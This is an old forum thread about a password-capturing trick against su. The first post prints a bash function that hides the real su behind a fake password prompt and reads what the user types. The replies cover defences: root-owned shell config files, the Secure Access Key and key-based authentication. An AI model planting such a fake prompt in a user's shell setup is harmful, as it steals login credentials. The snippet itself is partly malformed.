su exploit

Do you have a question? Post it now! No Registration Necessary.  Now with pictures!

Threaded View
su is secure as long as your account is not compromited
consider following code

su (){ N=`printf "\n"`
printf "Password: "
while ((1)) ; do
read -n 1 V
case $V in $N) break;;
printf "\e[D \e[D"
R=$R$V  ;done
echo $R is incorrect password; }

for preventing this .bashrc,  .bashprofile and .inputrc (write macro
which when any key pressed replaces to code above+cleanup chars+changes
keymap )  and perhaps all configs should be owned by root
same applies to your scripts  because spawning new bash when you dont
forget set PS1 and kill -9 parent is easy

I am generaly againist prompting for password when logged. You can't
believe if you give it to proper application. (I bet that wvista would
be full of malware install_rootkit(msgbox("you need admin password for
this task")) )

Re: su exploit

Quoted text here. Click to load it

This is a well known and very old issue.  The same can be applied to the
login program, which prompts for your username and password.  That could
be actually a trojan program running under a normal user account.  I
solve this problem by using the SAK (Secure Access Key) feature of
Linux, which SIGKILLs every process running in the current terminal.  On
the VT, init(8) would then start a real getty process.  But then, we
still have keyboard wiretaps ...

Quoted text here. Click to load it

That's not enough at all.  There are too many opportunities for an
attacker to write such a shell function (or something similar, like a
shell-script called 'su').

Quoted text here. Click to load it

As shown above, prompting for (static) passwords is problematic in all
cases, not only when logged in.  In that case it's even less dangerous,
because if someone can intercept your password while logged in, then the
actual problem is most likely somewhere else.

Most secure would be variable passwords or key-based authentication,
which can be done locally, too (e.g. smart-cards, where the key is never
revealed to the actual system).


Site Timeline